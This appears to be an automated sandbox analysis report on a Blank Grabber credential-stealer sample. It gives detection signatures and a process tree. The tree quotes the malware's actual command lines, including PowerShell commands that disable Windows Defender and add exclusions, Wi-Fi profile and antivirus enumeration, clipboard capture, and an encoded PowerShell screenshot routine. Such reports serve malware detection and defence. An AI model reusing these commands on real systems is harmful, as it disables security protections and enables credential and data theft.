Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
El9HaBFrFM.exe

Overview

General Information

Sample name:El9HaBFrFM.exe
renamed because original name is a hash value
Original sample name:cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6.exe
Analysis ID:1546321
MD5:9500da3f633857c71861d6af33820c12
SHA1:8ecddcb17a72de8cc0a4f1bea277023cfe3f32ab
SHA256:cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6
Tags:AkeoConsultingexeuser-JAMESWT_MHT
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
System process connects to network (likely due to code injection or exploit)
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious URL
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Connects to many different domains
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • El9HaBFrFM.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\El9HaBFrFM.exe" MD5: 9500DA3F633857C71861D6AF33820C12)
    • El9HaBFrFM.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\El9HaBFrFM.exe" MD5: 9500DA3F633857C71861D6AF33820C12)
      • cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7748 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7604 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7692 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7508 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7932 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7708 cmdline: C:\Windows\system32\cmd.exe /c "start bound.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bound.exe (PID: 7944 cmdline: bound.exe MD5: 42B9EB8BF1D2D2AABDA3977656AF4364)
          • chrome.exe (PID: 8768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1896,i,17984460610350237661,2584867532713279060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7912 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7956 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7276 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6032 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7268 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7200 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7440 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8132 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3468 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7260 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8320 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8368 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8568 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8380 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 8608 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 8396 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8576 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8504 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8712 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 9184 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 9064 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8980 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9036 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9080 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9132 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9140 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8252 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 2132 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7784 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9168 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8240 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7440 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
